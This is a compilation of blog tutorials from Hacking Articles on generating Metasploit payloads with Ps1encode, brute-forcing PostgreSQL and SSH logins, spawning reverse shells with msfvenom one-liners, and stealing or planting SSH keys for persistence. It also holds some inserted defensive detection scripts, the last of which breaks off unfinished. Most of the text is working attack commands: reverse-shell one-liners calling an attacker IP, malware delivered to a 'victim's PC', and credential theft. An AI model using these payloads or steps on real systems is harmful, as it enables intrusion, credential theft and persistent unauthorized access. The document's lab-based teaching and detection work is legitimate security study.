
Generate Metasploit Payload with Ps1encode


In this article, we will learn about the Ps1Encode tool and how to use it to generate malware in different file formats such as HTA and EXE.

Introduction

Ps1Encode was developed by Piotr Marszalik and Dave Kennedy with a few others. It generates a malicious payload that calls back to a Meterpreter handler and encodes the payload as it generates it, which is one way attackers bypass application whitelisting and other controls on a target system. It is written in Ruby and produces payloads based on Metasploit in any of the formats listed below. Whatever the wrapper format, the end goal is the same: get PowerShell running and execute the payload through it.

The formats supported by Ps1Encode are the following:

  • raw (encoded payload only – no powershell run options)
  • cmd (for use with bat files)
  • vba (for use with macro trojan docs)
  • vbs (for use with vbs scripts)
  • war (tomcat)
  • exe (executable) requires MinGW – x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
  • java (for use with malicious java applets)
  • js (javascript)
  • js-rd32 (javascript called by rundll32.exe)
  • php (for use with php pages)
  • hta (HTML applications)
  • cfm (for use with Adobe ColdFusion)
  • aspx (for use with Microsoft ASP.NET)
  • lnk (windows shortcut – requires a webserver to stage the payload)
  • sct (COM scriptlet – requires a webserver to stage the payload)

Download Ps1Encode with the git clone command, as shown in the image below:

Once it is downloaded, run the help option to check the syntax we have to use. Use the following set of commands:

cd ps1encode/
ls
./ps1encode.rb -h

The options we need are:

-i: local (attacker) IP address the payload connects back to

-p: local listening port

-a: Metasploit payload to use

-t: output format (raw when omitted)

Now we will generate a raw payload with the following command (no -t option, so the output is the raw encoded payload):

./ps1encode.rb -i 192.168.1.107 -p 8000 -a windows/meterpreter/reverse_https

Copy the code generated by the above command into a file with the .bat extension and serve it with Python's built-in web server. Start the server with the following command:

python -m SimpleHTTPServer 80

At the same time, start the multi handler to receive the session with the following set of commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit

Once the file is executed on the victim's PC, you will have your session as shown in the image above. Now we will generate our malware as an HTA file. Use the following command:

./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t hta

The above command creates the following script; send this file to the victim's PC using the Python server as before.

At the same time, start the multi handler with the following set of commands (the payload and port must match what was passed to ps1encode):

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.107
set lport 4444
exploit

Once the file is executed on the victim's PC, you will have your session as shown in the image above. Now we will generate an EXE file with the following command:

./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe

Send this file to the victim's PC using the Python server as before, as shown in the image above. At the same time, start the multi handler with the following set of commands (again matching the payload and port given to ps1encode):

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.107
set lport 4444
exploit

In this way, you can use Ps1Encode to generate files in any of the supported formats. As you can see, it is simple, convenient and user-friendly, and the possibilities with Ps1Encode are endless.

Author: Shubham Sharma is a cybersecurity enthusiast and researcher in the field of web application penetration testing.

The post Generate Metasploit Payload with Ps1encode appeared first on Hacking Articles.


6 Ways to Hack PostgreSQL Login


In this article, we will learn how to gain control of a victim's PC through port 5432, which is used by the PostgreSQL service. There are various ways to do it, and we will take the time to learn all of them, because different circumstances call for different measures.

Table of Contents

  • Hydra
  • X-Hydra
  • Medusa
  • Ncrack
  • Patator
  • Metasploit

Let's start!!

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, Postgres, http, https, smb, several databases, and much more.

Now, we need to choose a word list. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120 postgres

-L: path to the username list

-P: path to the password list

Once the command is executed it starts the dictionary attack, and you will have the right username and password in no time. As you can observe, we successfully grabbed the PostgreSQL username postgres and password postgres.

xHydra

This is the graphical front end for running a dictionary attack against port 5432 to hack a system. For this method to work:

Open xHydra in your Kali, select the Single Target option and enter the IP of your victim PC. Select postgres in the box next to the Protocol option and enter the port number 5432 in the Port field.

Now go to the Passwords tab, select Username List and enter the path of the text file containing the usernames in the box next to it.

Then select Password List and enter the path of the text file containing the passwords in the box next to it.

After doing this, go to the Start tab and click the Start button on the left.

The dictionary attack now starts, and you will obtain the username and password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, POSTGRES, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.

Run the following command

medusa -h 192.168.1.120 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres

Here

-U: path to the username list

-P: path to the password list

As you can observe, we successfully grabbed the PostgreSQL username postgres and password postgres.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.

Run the following command

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120:5432

Here

-U: path to the username list

-P: path to the password list

As you can observe, we successfully grabbed the PostgreSQL username postgres and password postgres.

Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is quite useful for brute force attacks against several services such as POSTGRES, HTTP and SMB.

patator pgsql_login host=192.168.1.120 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

From the image below you can observe that the dictionary attack starts, and thus you will obtain the username and password of your victim.

Metasploit

This module attempts to authenticate against a PostgreSQL instance using the username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Open a Kali terminal, type msfconsole, and then type:

use auxiliary/scanner/postgres/postgres_login
msf auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.1.120
msf auxiliary(scanner/postgres/postgres_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/postgres/postgres_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/postgres/postgres_login) > set stop_on_success true
msf auxiliary(scanner/postgres/postgres_login) > exploit

From the image below you can observe that we successfully grabbed the PostgreSQL username and password.
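Every tool above leaves the same trace on the database server: a burst of failed password authentications from one client, followed by a success. The detection below is an added example (not part of the original post); it assumes PostgreSQL logs with a log_line_prefix that includes the client host, such as '%t [%p] %h ', and the log lines are constructed.

```python
"""Flag dictionary attacks against PostgreSQL (port 5432) from the server log."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a hydra/medusa-style burst from 192.168.1.10 that ends
# in a successful login, and an unrelated single typo from 192.168.1.50.
SAMPLE_LOG = """\
2024-05-01 10:00:01 UTC [2311] 192.168.1.10 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01 UTC [2312] 192.168.1.10 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:02 UTC [2313] 192.168.1.10 FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:02 UTC [2314] 192.168.1.10 FATAL:  password authentication failed for user "root"
2024-05-01 10:00:02 UTC [2315] 192.168.1.10 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:03 UTC [2316] 192.168.1.10 FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:03 UTC [2317] 192.168.1.10 LOG:  connection authorized: user=postgres database=postgres
2024-05-01 10:05:00 UTC [2401] 192.168.1.50 FATAL:  password authentication failed for user "app"
2024-05-01 10:30:00 UTC [2402] 192.168.1.50 LOG:  connection authorized: user=app database=appdb
"""

# Assumes log_line_prefix = '%t [%p] %h ' (timestamp, pid, client host).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[\d+\] (?P<host>\S+) "
    r"(?P<level>FATAL|LOG):\s+(?P<msg>.*)$"
)
FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
OK_RE = re.compile(r"connection authorized: user=(?P<user>\S+)")


def parse(log_text):
    """Yield (timestamp, client host, 'fail'|'ok', user) for auth-related lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        fail, ok = FAIL_RE.search(m["msg"]), OK_RE.search(m["msg"])
        if fail:
            events.append((ts, m["host"], "fail", fail["user"]))
        elif ok:
            events.append((ts, m["host"], "ok", ok["user"]))
    return events


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {host: finding} for hosts with `threshold` failures inside the
    sliding window. `success_after` marks the case that matters most: a login
    accepted from that host while the burst was still in progress."""
    window = timedelta(seconds=window_seconds)
    fails = defaultdict(list)   # host -> [(ts, user)] still inside the window
    findings = {}
    for ts, host, kind, user in parse(log_text):
        if kind == "fail":
            fails[host] = [(t, u) for t, u in fails[host] if ts - t <= window]
            fails[host].append((ts, user))
            if host in findings:
                findings[host]["failures"] += 1
                findings[host]["users"].add(user)
            elif len(fails[host]) >= threshold:
                findings[host] = {
                    "host": host,
                    "first_seen": fails[host][0][0],
                    "failures": len(fails[host]),
                    "users": {u for _, u in fails[host]},
                    "success_after": False,
                }
        elif kind == "ok" and host in findings and fails[host]:
            if ts - fails[host][-1][0] <= window:
                findings[host]["success_after"] = True
                findings[host]["user"] = user
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_LOG).values():
        print(f)
```

Feed it the live log (for example `tail -F` piped into `detect_bruteforce`) and alert on `success_after`, which is the point at which the guessed credential should be rotated.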

Author: Rahul Virmani is a Certified Ethical Hacker and researcher in the field of network penetration testing (cybersecurity).


Generating Reverse Shell using Msfvenom (One Liner Payload)


Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat using the single-line payloads, also known as stagers, that come with Metasploit.

Basically, there are two types of terminal: TTYs and PTYs. A TTY is the Linux/Unix shell on a hardwired terminal, a keyboard and display attached over a serial connection; a PTY (pseudo-terminal) provides a copy of that terminal over a network connection such as SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open the terminal in your Kali Linux and type msfconsole to load the Metasploit framework, then search for all one-liner payloads for UNIX systems with the search command given below. It lists every payload that can be used to compromise a UNIX system.

search cmd/unix

From the image below you can observe that it has listed all the payloads that can be used to compromise a UNIX system. In this tutorial, we are going to use some of them to spawn a TTY shell.

Bash Shell

To obtain a bash reverse shell, use the reverse_bash payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

Here we entered the following details to generate the one-liner raw payload.

-p: the payload to use, i.e. cmd/unix/reverse_bash

lhost: listening IP address, i.e. the Kali Linux IP

lport: listening port number, i.e. 1111 (any port not already used by another service)

R: raw output format

As shown in the image below, the size of the generated payload is 67 bytes. Copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

For example, when the target runs the following malicious code in a terminal:

0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121

the attacker gets a reverse shell through netcat:

nc -lvp 1111

As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.

For example:

whoami: tells you that you are the root user of the system you have compromised.

Netcat Shell

To obtain a netcat reverse shell, use the reverse_netcat payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

Here we entered the following details to generate the one-liner raw payload.

-p: the payload to use, i.e. cmd/unix/reverse_netcat

lhost: listening IP address, i.e. the Kali Linux IP

lport: listening port number, i.e. 2222 (any port not already used by another service)

R: raw output format

As shown in the image below, the size of the generated payload is 104 bytes. Copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

When the target runs the following malicious code in a terminal (the named pipe is the same file throughout; its name is randomised by msfvenom):

mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admoszx | /bin/sh >/tmp/admoszx 2>&1; rm /tmp/admoszx

the attacker gets a reverse shell through netcat:

nc -lvp 2222

As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system.

Perl shell

To obtain a Perl reverse shell, use the reverse_perl payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

Here we entered the following details to generate the one-liner raw payload.

-p: the payload to use, i.e. cmd/unix/reverse_perl

lhost: listening IP address, i.e. the Kali Linux IP

lport: listening port number, i.e. 3333 (any port not already used by another service)

R: raw output format

As shown in the image below, the size of the generated payload is 232 bytes. Copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

Again, when the target runs the malicious code in a terminal, the attacker gets a reverse shell through netcat.

nc -lvp 3333

As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system. Here we found the target IP address 192.168.1.1106 by executing the ifconfig command in the TTY shell.

Python Shell

To obtain a Python reverse shell, use the reverse_python payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

Here we entered the following details to generate the one-liner raw payload.

-p: the payload to use, i.e. cmd/unix/reverse_python

lhost: listening IP address, i.e. the Kali Linux IP

lport: listening port number, i.e. 4444 (any port not already used by another service)

R: raw output format

As shown in the image below, the size of the generated payload is 533 bytes. Copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

Again, when the target runs the malicious code in his terminal, the attacker gets the reverse shell through netcat.

nc -lvp 4444

As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.

For example:

ifconfig: shows the IP configuration of the system you have compromised.

Ruby Shell

To obtain a Ruby reverse shell, use the reverse_ruby payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

Here we entered the following details to generate the one-liner raw payload.

-p: the payload to use, i.e. cmd/unix/reverse_ruby

lhost: listening IP address, i.e. the Kali Linux IP

lport: listening port number, i.e. 5555 (any port not already used by another service)

R: raw output format

As shown in the image below, the size of the generated payload is 131 bytes. Copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

Again, when the target runs the following malicious code in his terminal:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

the attacker gets a reverse shell through netcat:

nc -lvp 5555

As you can observe from the image below, the attacker has successfully obtained a TTY shell on the target system and can now do whatever he wishes.

For example:

ifconfig: shows the IP configuration of the system you have compromised.

Netcat Gaping (Traditional)

To obtain a command shell with traditional netcat, use the reverse_netcat_gaping payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

Here we entered the following details to generate the one-liner raw payload.

-p: the payload to use, i.e. cmd/unix/reverse_netcat_gaping

lhost: listening IP address, i.e. the Kali Linux IP

lport: listening port number, i.e. 6666 (any port not already used by another service)

R: raw output format

As shown in the image below, the size of the generated payload is 533 bytes. Copy this malicious code and send it to the target, then start netcat to accept the reverse connection and wait for the TTY shell.

To reach the target's /bin/sh and obtain a TTY shell, we first accessed a PTY on the target through SSH and then pasted the malicious code:

nc 192.168.1.103 6666 -e /bin/sh

nc -lvp 6666

From the image below you can observe that we successfully obtained a TTY shell on the target system.
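Each of the one-liners above has a recognisable shape in a process listing, which is what a defender can hunt for. The script below is an added example (not part of the original post): it matches those shapes (the bash /dev/tcp redirection, the mkfifo|nc pipe, `nc -e /bin/sh` and the Ruby TCPSocket loop) in the output of `ps -eo pid,user,args` and extracts the callback address. The process listing is constructed.

```python
"""Find the reverse-shell one-liners from this post in a `ps` listing."""
import re

IPV4 = r"\d+(?:\.\d+){3}"

# (rule name, pattern). Each pattern captures the host and port the shell
# connects back to, the first thing an incident responder needs.
RULES = [
    ("bash-dev-tcp",
     re.compile(rf"/dev/tcp/(?P<host>{IPV4})/(?P<port>\d+)")),
    ("mkfifo-nc-pipe",
     re.compile(rf"\bmkfifo\b.*\bnc\s+(?P<host>{IPV4})\s+(?P<port>\d+)")),
    ("nc-exec",
     re.compile(rf"\bnc\s+(?P<host>{IPV4})\s+(?P<port>\d+)\s+-e\s+\S*sh\b")),
    ("ruby-tcpsocket",
     re.compile(rf'TCPSocket\.new\("(?P<host>{IPV4})","(?P<port>\d+)"\).*IO\.popen')),
]

# Constructed `ps -eo pid,user,args` output: four shells from this post plus
# benign processes (a listener and a curl) that must not trigger.
SAMPLE_PS = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1203 ignite   bash
 1377 ignite   sh -c 0<&196-;exec 196<>/dev/tcp/192.168.1.103/1111;sh <&196 >&196 2>&196
 1402 www-data sh -c mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admoszx | /bin/sh >/tmp/admoszx 2>&1; rm /tmp/admoszx
 1410 ignite   nc 192.168.1.103 6666 -e /bin/sh
 1455 ignite   ruby -rsocket -e exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end
 1500 ignite   nc -lvp 8080
 1510 ignite   curl http://192.168.1.200/index.html
"""


def scan_processes(ps_text):
    """Return one hit per suspicious process: pid, user, rule, host, port, cmd."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the ps header row
        parts = line.split(None, 2)                  # pid, user, full command line
        if len(parts) < 3:
            continue
        pid, user, cmd = int(parts[0]), parts[1], parts[2]
        for name, pattern in RULES:
            m = pattern.search(cmd)
            if m:
                hits.append({"pid": pid, "user": user, "rule": name,
                             "host": m["host"], "port": int(m["port"]), "cmd": cmd})
                break                                # one rule per process is enough
    return hits


def callback_endpoints(hits):
    """Distinct host:port pairs to block at the egress firewall and hunt for."""
    return sorted({(h["host"], h["port"]) for h in hits})


if __name__ == "__main__":
    found = scan_processes(SAMPLE_PS)
    for h in found:
        print(f"pid={h['pid']} user={h['user']} {h['rule']} -> {h['host']}:{h['port']}")
    print("callback endpoints:", callback_endpoints(found))
```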

Author: Aarti Singh is a researcher and technical writer at Hacking Articles, an information security consultant, and a social media and gadget lover.


SSH Penetration Testing (Port 22)


Probing every open port is practically the first step attackers take to prepare their attack. A service has to keep its port open to do its job, yet an open port is exactly what attackers look for, so one must learn to secure ports even when they are open. In this post, we will discuss penetration testing of SSH, also known as Secure Shell.

Table of content

  • Introduction to SSH
  • SSH Installation
  • SSH Port Scanning
  • Methods to Connect SSH
    • Terminal Command (Linux)
    • Putty (Windows)
  • Port Redirection
  • Port Redirection Testing
  • Establish SSH connection using RSA key
  • Exploit SSH with Metasploit
    • SSH Key Persistence- Post Exploitation
    • Stealing the SSH key
    • SSH login using pubkey
  • SSH Password cracking

Introduction to SSH

The SSH protocol, also referred to as Secure Shell, is a technique for secure and reliable remote login from one computer to another. It offers several options for strong authentication and protects the security and integrity of connections and communications with strong encryption. It is a secure alternative to unprotected login protocols (such as telnet and rlogin) and insecure file transfer methods (such as FTP).

SSH Installation

It is very easy to install and configure the ssh service: install the openssh-server package from the Ubuntu repository. To install any service you need a root-privileged account; then run the command below.

apt install openssh-server

When you execute the above command it extracts the package and installs the default configuration on the host machine. You can check the open port with the netstat command on the host machine.

SSH Port Scanning

If you do not have direct access to the host machine, use nmap to identify the port state remotely; this is considered the initial step of a penetration test. Here we are going to use Kali Linux to perform the penetration test.

So, to identify an open port on a remote host, we will use an nmap version scan, which not only identifies the open port but also grabs the banner that reveals the installed version of the service.

nmap -sV -p22 192.168.1.103

Methods to Connect SSH

Terminal Command (Linux)

Now execute the following command to access the ssh shell of the remote machine as an authorized user.

Username: ignite

Password: 123

ssh ignite@192.168.1.103

Putty (Windows)

Step1: Install putty.exe and run it, then enter the host IP address <192.168.1.103> and port <22>, and choose SSH as the connection type.

Step2: To establish a connection between the client and the server, a putty session opens and asks for login credentials.

Username: ignite

Password: 123

Port Redirection

By default, ssh listens on port 22, which means that if an attacker finds port 22 open he can attack it to connect to the host machine. Therefore, a system administrator may choose port redirection (port mapping), changing the default port to another one so that the service only receives connection requests from the authorized network.

Follow the steps below for port redirection:

Step1: Edit sshd_config inside /etc/ssh using an editor

nano /etc/ssh/sshd_config

Step2: Change Port 22 to 2222 and save the file.

Step3: Then restart the ssh service.

Port Redirection Testing

Thus, when we ran the scan on port 22 it showed the port state CLOSED for ssh, whereas port 2222 is OPEN for ssh, as can be seen in the given image.

Establish SSH connection using RSA key

Strong passwords alone are not enough to secure the server, because a brute force attack can still crack them. That is why you need an additional authentication method to secure the SSH server.

SSH key pairs are another necessary feature for authenticating clients to the server. A key pair consists of two long strings of characters: a public key and a private key. You place the public key on the server and the private key on the client machine, and unlock the server by connecting with the client's private key. Once the keys match, the system lets you establish an SSH session without typing a password.

ssh-keygen is a tool for creating new authentication key pairs for SSH. Such key pairs are used for automating logins, single sign-on, and for authenticating hosts.

We will follow these steps to generate a key pair for an authenticated connection.

Step1: Run the given command to generate an ssh key pair (id_rsa and id_rsa.pub) on the host machine (Ubuntu).

ssh-keygen

Step2: Do the same on the client machine that is authorized to connect to the host machine (Ubuntu).

ssh-keygen

Step3: Once the key pair (id_rsa and id_rsa.pub) is generated, copy id_rsa.pub into a file named authorized_keys, as shown in the given image.

cat id_rsa.pub > authorized_keys

Step4: Share authorized_keys with the host machine by copying it into the .ssh directory.

Step5: Edit sshd_config inside /etc/ssh using an editor

nano /etc/ssh/sshd_config

Step6: Uncomment the PasswordAuthentication line and set it to no

As a result, only the authorized machine holding the rsa key can establish a connection with the host machine, without using a password.

Now, if you try to connect to the ssh server with a username and password, the server will drop your connection request, because it only authenticates requests that present an authorized key.

Step7: Copy the id_rsa key from Kali Linux to the Windows machine to establish a connection from Windows using the authorized key.

Step8: Install puttygen.exe

Step9: Run puttygen.exe, load id_rsa and save the private key under the name Key

Step10: Use putty.exe to connect to the host machine by entering hostname 192.168.1.103 and port 22.

Step11: Navigate to SSH > Auth and browse to the private key that you saved in step 9.

This establishes an ssh connection between the Windows client and the server without using a password.

Exploit SSH with Metasploit

SSH Key Persistence- Post Exploitation

Consider a situation where, by compromising the host machine, you have obtained a meterpreter session and want to leave a permanent backdoor that will give you a connection next time.

This can be achieved with the Metasploit post-exploitation module "SSH Key Persistence" when ssh is running on port 22 on the host machine.

This module adds an SSH key to a specified user (or all users) to allow remote login to the victim via SSH at any time.

use post/linux/manage/sshkey_persistence
msf post(linux/manage/sshkey_persistence) > set session 1
msf post(linux/manage/sshkey_persistence) > exploit

As can be seen in the given image, it added an authorized key to /home/ignite/.ssh and stored the private key under /root/.msf4/loot.

We verify this by connecting to the host machine on port 22 using the private key generated above. Here I have renamed the private key to "key" and given it permission 600.

chmod 600 key
ssh -i key ignite@192.168.1.103

Bravo!! It works without any trouble, and in this way we can use an ssh key as a persistent backdoor.

Stealing the SSH key

Consider a situation where, by compromising the host machine, you have obtained a meterpreter session, port 22 is open for ssh, and you want to steal the SSH keys and authorized_keys. This can be done with the Metasploit post-exploitation module "Multi Gather OpenSSH PKI Credentials Collection", as discussed below.

This module collects the contents of all users' .ssh directories on the targeted machine. Additionally, known_hosts, authorized_keys and any other files there are also downloaded. This module is largely based on firefox_creds.rb.

use post/multi/gather/ssh_creds
msf post(multi/gather/ssh_creds) > set session 1
msf post(multi/gather/ssh_creds) > exploit

From the image below you can see that we got all the keys stored in /home/ignite/.ssh, saved on our local machine under /root/.msf4/loot, and can now use those keys to log into the SSH server.

This can also be done manually by downloading the keys directly from /home/ignite/.ssh, as shown in the image below.

We verify this by connecting to the host machine on port 22 using the private key downloaded above. First change the permission of the rsa key, then connect as shown below.

chmod 600 key
ssh -i key ignite@192.168.1.103

It works without any trouble, and in this way a stolen ssh key also serves as a persistent backdoor.
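Both the persistence module and the key theft above leave or exploit entries in a user's authorized_keys, so the defender's check is to audit that file against the keys the administrator actually issued. The script below is an added example (not part of the original post or of Metasploit): it parses authorized_keys, computes each key's SHA256 fingerprint the same way `ssh-keygen -lf` does (SHA256 over the decoded key blob, base64 without padding) and reports entries whose fingerprint is not on an allowlist. The file contents and key blobs are constructed stand-ins, not real keys; run it against a real /home/ignite/.ssh/authorized_keys with the fingerprints you issued.

```python
"""Audit an authorized_keys file for keys the administrator did not issue."""
import base64
import hashlib
import shlex

# Key types sshd accepts in authorized_keys; anything before this token is options.
KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
    "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
}


def fingerprint(blob_b64):
    """SHA256 fingerprint as printed by `ssh-keygen -lf`."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """One dict per entry: line, options, type, fingerprint, comment (or error)."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)            # keeps command="a b" options as one token
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            entries.append({"line": lineno, "error": "no key type/blob found"})
            continue
        try:
            fp = fingerprint(tokens[idx + 1])
        except ValueError:                    # binascii.Error is a ValueError
            entries.append({"line": lineno, "error": "key blob is not valid base64"})
            continue
        entries.append({"line": lineno, "options": " ".join(tokens[:idx]),
                        "type": tokens[idx], "fingerprint": fp,
                        "comment": " ".join(tokens[idx + 2:])})
    return entries


def audit_authorized_keys(text, allowlist):
    """Entries that are unparseable or whose fingerprint is not on the allowlist."""
    return [e for e in parse_authorized_keys(text)
            if "error" in e or e["fingerprint"] not in allowlist]


def fake_blob(label):
    # Constructed stand-in for a real base64 key blob (NOT a usable key); the
    # fingerprint computation is identical for real blobs.
    return base64.b64encode(f"constructed-key:{label}".encode()).decode()


# Constructed authorized_keys: two issued keys, one unexpected key of the kind a
# persistence module leaves behind, and one corrupt line.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# keys for ignite (constructed sample)",
    f"ssh-ed25519 {fake_blob('laptop')} ignite@laptop",
    f'from="192.168.1.0/24" ssh-rsa {fake_blob("backup")} backup@nas',
    f"ssh-rsa {fake_blob('unknown')} root@kali",
    "ssh-rsa not-base64!!! broken",
])
ALLOWLIST = {fingerprint(fake_blob("laptop")), fingerprint(fake_blob("backup"))}


if __name__ == "__main__":
    for finding in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(finding)
```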

SSH login using pubkey

Suppose you have the id_rsa key of the host machine and want to obtain a meterpreter session via Metasploit. This can be achieved with the following module.

This module tests ssh logins on a range of machines using a given private key file and reports successful logins. If you have loaded a database plugin and connected to a database, the module records successful logins and hosts so you can track your access. Key files may be a single private key or several private keys in a single directory.

use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.1.103
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set username ignite
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path /root/.ssh/id_rsa
msf auxiliary(scanner/ssh/ssh_login_pubkey) > exploit

This gives a command shell session, which can be upgraded to a meterpreter session by executing the following command.

sessions -u 1

SSH Password cracking

We can run a brute force attack against ssh to guess the password, or to test the lockout policy, while performing a penetration test on SSH. It requires a username list and a password list; here we have the username dictionary "user.txt" and the password list "pass.txt", and perform the brute force attack with hydra.

hydra -L user.txt -P pass.txt 192.168.1.103 ssh

As a result you can observe that the host machine has no defence against brute force attacks, and we were able to obtain ssh credentials.

To protect your service against brute force attacks you can use fail2ban, which is an IPS. See our separate article on setting up fail2ban in the network.

If you look at the image below, you can see that this time the host machine drops the connection requests when we try to launch a brute force attack.

Conclusion: In this post, we discussed possible ways to secure SSH and how to perform penetration testing against such a setup.
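The Port Redirection steps and Step6 of the RSA key section both edit sshd_config, and the hydra run above only works because PasswordAuthentication was still in effect. The script below is an added example (not part of the original post): it reads sshd_config the way sshd does (lines starting with '#' are comments, keywords are case-insensitive, and the first occurrence of a keyword wins) and reports the settings this post changes. The sample configs are constructed; Match blocks are deliberately not evaluated.

```python
"""Audit sshd_config for the settings changed in this post."""
import re

# sshd's compiled-in defaults for the keywords audited here.
DEFAULTS = {
    "port": "22",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
}


def parse_sshd_config(text):
    """Return {keyword: value} using sshd's first-occurrence-wins rule."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # 'Port 2222' or 'Port=2222'
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break                          # conditional block: out of scope here
        settings.setdefault(key, value)    # later duplicates are ignored by sshd
    return settings


def effective(settings, key):
    """Configured value, or sshd's default when the keyword is absent/commented."""
    return settings.get(key, DEFAULTS[key]).lower()


def audit_sshd_config(text):
    """Return (keyword, effective value, problem) tuples for weak settings."""
    s = parse_sshd_config(text)
    findings = []
    if effective(s, "port") == "22":
        findings.append(("port", "22",
                         "default port; port redirection step not applied"))
    if effective(s, "passwordauthentication") != "no":
        findings.append(("passwordauthentication", effective(s, "passwordauthentication"),
                         "password logins accepted, so a dictionary attack can succeed"))
    if effective(s, "pubkeyauthentication") != "yes":
        findings.append(("pubkeyauthentication", effective(s, "pubkeyauthentication"),
                         "key-based login disabled; authorized_keys will not be honoured"))
    return findings


# Constructed configs. A commented-out line documents the default; it sets nothing.
WEAK_CONFIG = """\
#Port 22
#PasswordAuthentication yes
"""

# The trap: an earlier 'yes' silently wins over the 'no' appended at the bottom,
# so the server still accepts passwords even though the file looks hardened.
MISLEADING_CONFIG = """\
Port 2222
PasswordAuthentication yes
PubkeyAuthentication yes
# added later, but sshd keeps the first value above
PasswordAuthentication no
"""

HARDENED_CONFIG = """\
Port 2222
PasswordAuthentication no
PubkeyAuthentication yes
"""


if __name__ == "__main__":
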